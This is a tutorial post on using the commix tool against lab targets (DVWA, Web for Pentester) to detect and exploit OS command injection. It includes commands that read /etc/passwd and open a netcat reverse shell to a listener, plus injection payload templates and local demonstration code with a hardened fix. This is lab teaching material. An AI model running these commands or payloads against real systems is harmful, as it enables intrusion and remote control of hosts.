Hello everyone. Everybody here knows what OS command injection is and what its consequences are. We can test for it manually, by identifying an input parameter and trying multiple payloads against it, or automatically with tools such as Burp Suite and commix.

Here we are going to talk about commix (short for [comm]and [i]njection e[x]ploiter), a tool pentesters commonly use to detect and exploit OS command injection automatically.

commix comes preinstalled in many penetration-testing distributions, or you can download it from GitHub: https://github.com/commixproject/commix In my case, I downloaded it from GitHub.

python commix.py --help
As with any tool, start with the help option; this lists every option commix supports.

For this demonstration you can use Metasploitable 2 (which includes DVWA) or PentesterLab's Web for Pentester.

python commix.py -u "http://192.168.43.58/commendexec/example1.php?ip=127.0.0.1"
In the above example we run commix against the ip parameter of a GET request; commix detects the injection and drops us into its interactive shell on the target.
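To show what commix is actually checking against that parameter, here is an added example (my own illustration, not commix's code and not from the original post). It stands in for the Web for Pentester ping page with a constructed Python handler that concatenates the ip parameter into a shell string, tries the classic separators commix uses for results-based injection, and proves execution with shell arithmetic rather than a plain echo marker, so a page that merely reflects the payload back is not counted as vulnerable. The hardened handler beside it shows the fix: strict validation and no shell.

```python
"""Minimal results-based OS command injection probe, in the style of commix.

The 'vulnerable app' is a constructed stand-in for a ping page: it pastes
the ip parameter into a shell string.  ping is replaced by echo so the
example runs offline on any box with /bin/sh.
"""
import ipaddress
import random
import subprocess


def vulnerable_ping(ip: str) -> str:
    """Constructed vulnerable handler: shell command built by string concatenation."""
    cmd = "echo Pinging " + ip          # same bug as `shell_exec("ping " . $_GET["ip"])`
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_ping(ip: str) -> str:
    """Same handler fixed: allow-list validation of the input and no shell at all."""
    try:
        ipaddress.ip_address(ip)        # anything that is not a bare IP is rejected
    except ValueError:
        return "invalid address\n"
    return subprocess.run(["echo", "Pinging", ip], capture_output=True, text=True).stdout


# Separator templates commix tries for classic (results-based) injection.
SEPARATORS = {
    "semicolon": "{base}; {cmd}",
    "pipe": "{base} | {cmd}",
    "and": "{base} && {cmd}",
    "or": "{base} || {cmd}",
    "newline": "{base}\n{cmd}",
    "subshell": "{base} $({cmd})",
    "backtick": "{base} `{cmd}`",
}


def probe(send, base: str = "127.0.0.1", rng=None) -> list:
    """Return the names of the separators that achieved command execution.

    `send` submits one parameter value and returns the response body.
    Execution is proven by arithmetic: the payload carries `echo $((a+b))`,
    so the sum shows up in the response only if a shell evaluated it.  A
    response that just reflects the payload contains a and b, not the sum.
    """
    if rng is None:
        rng = random.Random()
    hits = []
    for name, template in SEPARATORS.items():
        a, b = rng.randint(1000, 9999), rng.randint(1000, 9999)
        payload = template.format(base=base, cmd=f"echo $(({a}+{b}))")
        if str(a + b) in send(payload):
            hits.append(name)
    return hits


if __name__ == "__main__":
    print("vulnerable:", probe(vulnerable_ping))
    print("hardened:  ", probe(hardened_ping))
```

Against the vulnerable handler every separator except `||` fires (echo succeeds, so the right-hand side of `||` never runs, which is why commix also tries `||` only where the first command can be made to fail); against the hardened handler nothing fires, because the whole value is rejected before any command runs.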

As the help output shows, commix has many options that let us do more than just confirm the injection.

python commix.py -u "http://192.168.43.58/commendexec/example1.php?ip=127.0.0.1" --hostname
In the above example we pass the --hostname option to retrieve the target's hostname; the result is "The hostname is debian".
Passing --sys-info instead returns the target's system information (operating system and hardware platform), and the other enumeration options work the same way.

If we want to read a file located on the vulnerable target, we can do that easily as well.

python commix.py -u "http://192.168.43.58/commendexec/example1.php?ip=127.0.0.1" --file-read=/etc/passwd
In the above example we pass the --file-read option with the path of the file, and commix reads it through the injection and prints its contents.

If we want a reverse shell, we usually get it with netcat, but we can also upload a PHP or Python backdoor and execute it with a command.

python commix.py -u "http://192.168.43.58/commendexec/example1.php?ip=127.0.0.1" --os-cmd="nc -e /bin/sh 192.168.X.X 4444"
In the above example we run an arbitrary OS command with --os-cmd, giving the listener's IP address and port number. One caveat: the -e option only exists in some netcat builds (traditional netcat and ncat); the OpenBSD netcat that many Linux distributions ship does not have it, so check which netcat the target has before relying on this payload.

Before running that command we need a netcat listener on the same port, so the shell has something to connect back to:

nc -lvp 4444

For a POST request we need to give commix more information: the cookie and the POST data with their values. First we need to capture those values, which we can do with any proxy tool. I used Burp Proxy here to capture the request and got the cookie as well as the ip parameter.

Intercept the request in the proxy and copy the Cookie header and the POST body from it.
python commix.py -u "http://192.168.43.58/dvwa/vulnerabilities/exec/" --cookie="cookie value" --data="value"
In the above example we pass the additional data required in the POST case: --cookie takes the value of the Cookie header from the intercepted request (for DVWA this includes the PHPSESSID session cookie and the security level, and without it the page just sends us to the login form), and --data takes the POST body, which must contain the ip parameter so that commix has a parameter to inject into.
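To make the POST case concrete, here is an added example (my own, not commix's code and not from the original post). It starts a constructed local stand-in for the DVWA exec page, which refuses requests without a PHPSESSID cookie and otherwise concatenates the ip field of the POST body into a shell command, and then sends the same kind of request commix builds from --cookie and --data: the Cookie header plus a form body whose ip parameter carries the payload. The session value, the listening port and the echo-for-ping substitution are assumptions made so the example runs offline.

```python
"""Constructed target plus the POST request commix sends from --cookie/--data."""
import subprocess
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.error import HTTPError
from urllib.parse import parse_qs, urlencode
from urllib.request import Request, urlopen


class FakeDvwaExec(BaseHTTPRequestHandler):
    """Stand-in for /dvwa/vulnerabilities/exec/: session cookie required, ip field injected."""

    def do_POST(self):
        if "PHPSESSID=" not in self.headers.get("Cookie", ""):
            self._reply(403, "login required\n")     # DVWA would redirect to login.php
            return
        length = int(self.headers.get("Content-Length", "0"))
        form = parse_qs(self.rfile.read(length).decode())
        ip = form.get("ip", [""])[0]
        # the bug: ping (here echo, to run offline) built by concatenation and run via a shell
        out = subprocess.run("echo Pinging " + ip, shell=True, capture_output=True, text=True).stdout
        self._reply(200, out)

    def _reply(self, code, text):
        body = text.encode()
        self.send_response(code)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the example quiet
        pass


def start_target():
    """Bind the stand-in on a free loopback port and serve it in the background."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), FakeDvwaExec)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d/vulnerabilities/exec/" % srv.server_address[1]


def post(url, data, cookie=None):
    """What `commix -u URL --data=... --cookie=...` sends: a form body and the Cookie header."""
    req = Request(url, data=urlencode(data).encode(), method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    if cookie:
        req.add_header("Cookie", cookie)
    try:
        with urlopen(req, timeout=5) as resp:
            return resp.status, resp.read().decode()
    except HTTPError as err:
        return err.code, err.read().decode()


def demo():
    """Same payload twice: without the cookie it never reaches the vulnerable code."""
    srv, url = start_target()
    try:
        form = {"ip": "127.0.0.1; echo $((1234+4321))", "Submit": "Submit"}
        anon_status, _ = post(url, form)
        status, body = post(url, form, "PHPSESSID=0123456789abcdef; security=low")
        return anon_status, status, "5555" in body
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())
```

The first request is rejected with 403 because no session cookie was sent, which is exactly why commix needs --cookie for pages behind a login; the second, with the cookie and the ip field in --data, reaches the shell and the arithmetic result 5555 comes back in the response.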
